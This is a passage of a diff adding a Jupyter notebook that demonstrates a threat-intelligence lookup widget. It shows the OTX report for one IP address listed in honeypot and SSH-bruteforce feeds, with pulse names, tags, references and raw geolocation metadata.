+    "> to the service\n",
+    "\n",
+    "The value of the selected IoC entry is available as `ti_selector.value`\n",
+    "\n",
+    "You can match this back to the original results DataFrame as follows:\n",
+    "```\n",
+    "results[results[\"Ioc\"] == ti_selector.value[0]]\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 21,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "80b0a3d0b73d45caa490fccff506336f",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": "VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle(description_width='initial')), Sel…"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": "<hr>",
+      "text/plain": "<IPython.core.display.HTML object>"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": "<h2 style='border: 1px solid;background-color: DarkGray; padding: 6px'>51.75.29.61</h2><h3 style='background-color: SteelBlue; padding: 6px'>Type: 'ipv4', Provider: OTX, severity: high</h3><h4>Details</h4>\n<style>\n    .tb_ti_res {border-collapse: collapse; width: 60%; border: 1px solid #ddd !important;}\n    .cell_ti {border: 1px solid #ddd !important;\n        text-align: left !important; padding: 5px !important; height: 12px}\n    .cell_ti_first {border: 1px solid #ddd !important; width: 25%;\n        text-align: left !important; padding: 5px !important; height: 12px}\n</style>\n<table class='tb_ti_res'><tr class='cell_ti'><td class='cell_ti_first'>OTX</td><tr class='cell_ti'><td class='cell_ti_first'>pulse_count</td><td class='cell_ti'>50</td></tr><tr class='cell_ti'><td class='cell_ti_first'>names</td><td class='cell_ti'>['IOCs - 202135947 - ANIA Threat Feeds - IP Segment 0', 'IOCs - 2020122102 - ANIA Threat Feeds - IP Segment 1', 'IOCs - 202096112 - ANIA Threat Feeds - IP Segment 0', 'IOCs - 20208141635 - ANIA Threat Feeds - IP Segment 0', 'Ty', 'IOCs - 20207302230 - ANIA Threat Feeds - IP Segment 0', 'IOCs - 20207131443 - ANIA Threat Feeds - IP Segment 1', 'STU_Honeypots_Bruteforce_Source_IP 2020/07/11', 'SSH - US Honeypot IoCs 2020-07-10', 'STU_Honeypots_Bruteforce_Source_IP 2020/07/10', '2020-07-02 Fail2ban b3478ecb-279e-4ad8-864b-2538ee286dda', 'STU_Honeypots_Bruteforce_Source_IP 2020/06/30', 'IOCs - 20206301939 - ANIA Threat Feeds - IP Segment 0', '2020-06-29 Fail2ban f726332c-9c60-4e5e-8ae2-c3ec592fbed7', '2020-06-25 Fail2ban a5ce7d8c-4741-4414-9caf-fc179a6fb81d', 'SSH - US Honeypot IoCs 2020-06-20', '2020-06-20 Fail2ban dce5352e-74ce-432e-8c57-d9819a9a6a79', '2020-06-19 Fail2ban f0882f07-135c-4510-9f4c-ccada08a12e5', 'SSH Bruteforce Hosts for 2020-06-19', '2020-06-17 Fail2ban 76fdb4c1-f709-4f45-8ecf-f5f9aa52ab55', '2020-06-12 Fail2ban 60886aec-1450-459b-b91b-5d5b204183ad', '2020-06-09 Fail2ban e197ce9a-dfcb-4ae4-a641-ae947a9f78cb', 'SSH - US Honeypot IoCs 2020-06-08', 'Baton Rouge Louisiana HoneyPot Tier 2 Indicators:February:2020', 'Baton Rouge Louisiana TPOT 19 Honeypot Events:2020-06-01 02:14:25.546768', 'IOCs - 20205311517 - ANIA Threat Feeds - IP Segment 0', 'IOCs - 20205301440 - ANIA Threat Feeds - Segment 0', '2020-05-25 Fail2ban e37d5902-91dd-4ede-8e87-14bb54fdac24', '2020-05-21 Fail2ban 9e9111dd-ddcb-441e-ae99-d5ee334c779d', '2020-05-17 Fail2ban cdf0b492-c29e-4389-92ae-4415dbf2c3a2', 'SSH Bruteforce hosts for 2020-05-22', '2020-05-12 Fail2ban 56d04fa8-75b9-43c4-9396-0312786fe541', '2020-05-11 Fail2ban fd0c74a2-1f1b-4996-abae-6989bf0811d0', '2020-05-09 Fail2ban e287bc93-747c-4a79-9fe3-7308a02b4c0a', 'SSH - US Honeypot IoCs 2020-05-06', 'SSH Bruteforce hosts for 2020-05-31', 'SSH Bruteforce hosts for 2020-05-11', 'SSH Bruteforce hosts for 2020-05-10', '2020-05-03 Fail2ban 6209860d-08c3-45e7-8e10-8331f86ffc3a', 'Baton Rouge Louisiana TPOT 19 Honeypot Events:2020-04-28', 'SSH honeypot logs for 4/26/2020', '2020-04-25 Fail2ban 6dc27fe2-df3f-4096-aee8-70b84449f012', '2020-04-22 Fail2ban 2ef4f696-85a2-4ae7-9fb9-82e7d8591bd0', 'SSH Bruteforce hosts for 2020-04-20', 'Baton Rouge Louisiana TPOT 19 Honeypot Events:Jan to March ,2020', 'SSH Bruteforce hosts for 2020-04-11', '2020-04-08 Fail2ban 47aa302c-a65d-4564-85e3-f4428c9c7b3e', 'IOCs - 2020461246', 'SSH - US Honeypot IoCs 2020-04-02', 'SSH honeypot logs for 3/30/2020']</td></tr><tr class='cell_ti'><td class='cell_ti_first'>tags</td><td class='cell_ti'>[[], [], [], [], [], [], [], ['Bruteforce', 'Honeypot'], ['honeypot', 'ssh', 'cowrie'], ['Bruteforce', 'Honeypot'], ['fail2ban'], ['Bruteforce', 'Honeypot'], [], ['fail2ban'], ['fail2ban'], ['honeypot', 'ssh', 'cowrie'], ['fail2ban'], ['fail2ban'], ['Bruteforce', 'SSH', 'honeypot'], ['fail2ban'], ['fail2ban'], ['fail2ban'], ['honeypot', 'ssh', 'cowrie'], ['tsec', 'tpot19', 'honeypot'], ['tsec', 'tpot19', 'honeypot'], [], [], ['fail2ban'], ['fail2ban'], ['fail2ban'], ['china', 'france', 'germany', 'singapore', 'korea', 'group', 'spain', 'canada', 'italy', 'brazil', 'mexico'], ['fail2ban'], ['fail2ban'], ['fail2ban'], ['honeypot', 'ssh', 'cowrie'], ['china', 'germany', 'france', 'singapore', 'group', 'india', 'canada', 'korea', 'brazil', 'mexico'], ['china', 'france', 'india', 'canada', 'italy', 'poland', 'group', 'singapore', 'germany', 'brazil', 'korea', 'mexico', 'japan', 'ssh bruteforce', 'israel', 'australia', 'bruteforce'], ['china', 'france', 'canada', 'korea', 'singapore', 'india', 'italy', 'germany', 'brazil', 'ssh bruteforce', 'group', 'poland', 'australia', 'switzerland', 'bruteforce', 'japan'], ['fail2ban'], ['tsec', 'tpot19', 'honeypot'], ['SSH', 'bruteforce', 'honeypot'], ['fail2ban'], ['fail2ban'], ['china', 'france', 'germany', 'singapore', 'brazil', 'india', 'group', 'italy', 'canada', 'korea', 'poland', 'mexico', 'japan', 'cambodia', 'australia', 'ssh bruteforce', 'israel', 'spain', 'switzerland'], ['tsec', 'tpot19', 'honeypot'], ['france', 'china', 'korea', 'india', 'japan', 'canada', 'singapore', 'poland', 'italy', 'group', 'cambodia', 'germany', 'brazil', 'mexico', 'kazakhstan', 'ssh bruteforce'], ['fail2ban'], [], ['honeypot', 'ssh', 'cowrie'], ['SSH', 'bruteforce', 'honeypot']]</td></tr><tr class='cell_ti'><td class='cell_ti_first'>references</td><td class='cell_ti'>[[], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], ['https://jamesbrine.com.au/bruteforce-ip-list-2020-06-19/', 'https://jamesbrine.com.au'], [], [], [], [], ['https://github.com/dtag-dev-sec/tpotce'], ['https://github.com/dtag-dev-sec/tpotce'], [], [], [], [], [], ['https://jamesbrine.com.au/bruteforce-ip-list-2020-05-22/', 'https://jamesbrine.com.au/'], [], [], [], [], ['https://jamesbrine.com.au/bruteforce-ip-list-2020-05-31/', 'https://jamesbrine.com.au/'], ['https://jamesbrine.com.au/bruteforce-ip-list-2020-05-11/', 'https://jamesbrine.com.au/'], ['https://jamesbrine.com.au/bruteforce-ip-list-2020-05-10/', 'https://jamesbrine.com.au/'], [], ['https://github.com/dtag-dev-sec/tpotce'], [], [], [], ['https://jamesbrine.com.au/bruteforce-ip-list-2020-04-20/', 'https://jamesbrine.com.au'], ['https://github.com/dtag-dev-sec/tpotce'], ['https://jamesbrine.com.au/bruteforce-ip-list-2020-04-11/', 'https://jamesbrine.com.au/'], [], [], [], []]</td></tr></tr></table><h4>Reference: </h4><a href='https://otx.alienvault.com/api/v1/indicators/IPv4/51.75.29.61/general'>https://otx.alienvault.com/api/v1/indicators/IPv4/51.75.29.61/general</a><br><hr><h4>Raw Results</h4>\n        <details>\n        <summary> <u>Raw results from provider...</u></summary>\n        <pre  style=\"font-size:11px\">{'accuracy_radius':&nbsp;500,<br>&nbsp;'area_code':&nbsp;0,<br>&nbsp;'asn':&nbsp;'AS16276&nbsp;OVH&nbsp;SAS',<br>&nbsp;'base_indicator':&nbsp;{'access_reason':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'access_type':&nbsp;'public',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'content':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'description':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;1560742584,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator':&nbsp;'51.75.29.61',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'title':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'type':&nbsp;'IPv4'},<br>&nbsp;'charset':&nbsp;0,<br>&nbsp;'city':&nbsp;None,<br>&nbsp;'city_data':&nbsp;True,<br>&nbsp;'continent_code':&nbsp;'EU',<br>&nbsp;'country_code':&nbsp;'FR',<br>&nbsp;'country_code2':&nbsp;'FR',<br>&nbsp;'country_code3':&nbsp;'FRA',<br>&nbsp;'country_name':&nbsp;'France',<br>&nbsp;'dma_code':&nbsp;0,<br>&nbsp;'false_positive':&nbsp;[],<br>&nbsp;'flag_title':&nbsp;'France',<br>&nbsp;'flag_url':&nbsp;'/assets/images/flags/fr.png',<br>&nbsp;'indicator':&nbsp;'51.75.29.61',<br>&nbsp;'latitude':&nbsp;48.8582,<br>&nbsp;'longitude':&nbsp;2.3387,<br>&nbsp;'postal_code':&nbsp;None,<br>&nbsp;'pulse_info':&nbsp;{'count':&nbsp;50,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'pulses':&nbsp;[{'TLP':&nbsp;'green',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'adversary':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'attack_ids':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'author':&nbsp;{'avatar_url':&nbsp;'https://otx20-web-media.s3.amazonaws.com/media/avatars/user_91912/resized/80/avatar_2b1b2b88b6.png',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'91912',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_following':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribed':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'username':&nbsp;'AlessandroFiori'},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'cloned_from':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'comment_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'created':&nbsp;'2021-03-05T08:53:39.841000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'description':&nbsp;'ANIA&nbsp;Collector&nbsp;-&nbsp;Advanced&nbsp;Network&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Interactive&nbsp;Analysis&nbsp;Collector&nbsp;-&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Collected&nbsp;from&nbsp;Internet&nbsp;Storm&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Center&nbsp;IOCs&nbsp;List',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'downvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'export_count':&nbsp;10,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'follower_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'groups':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'6041f1938667e466a1363a0f',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'in_group':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_type_counts':&nbsp;{},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'industries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_author':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_modified':&nbsp;True,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribing':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'locked':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'malware_families':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified':&nbsp;'2021-04-04T08:01:40.569000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified_text':&nbsp;'17&nbsp;days&nbsp;ago&nbsp;',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'name':&nbsp;'IOCs&nbsp;-&nbsp;202135947&nbsp;-&nbsp;ANIA&nbsp;Threat&nbsp;Feeds&nbsp;-&nbsp;IP&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Segment&nbsp;0',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'public':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'pulse_source':&nbsp;'api',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'references':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_is_active':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_type':&nbsp;'IPv4',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'subscriber_count':&nbsp;256,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'tags':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'targeted_countries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_has_agents':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_scannable':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'upvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'validator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;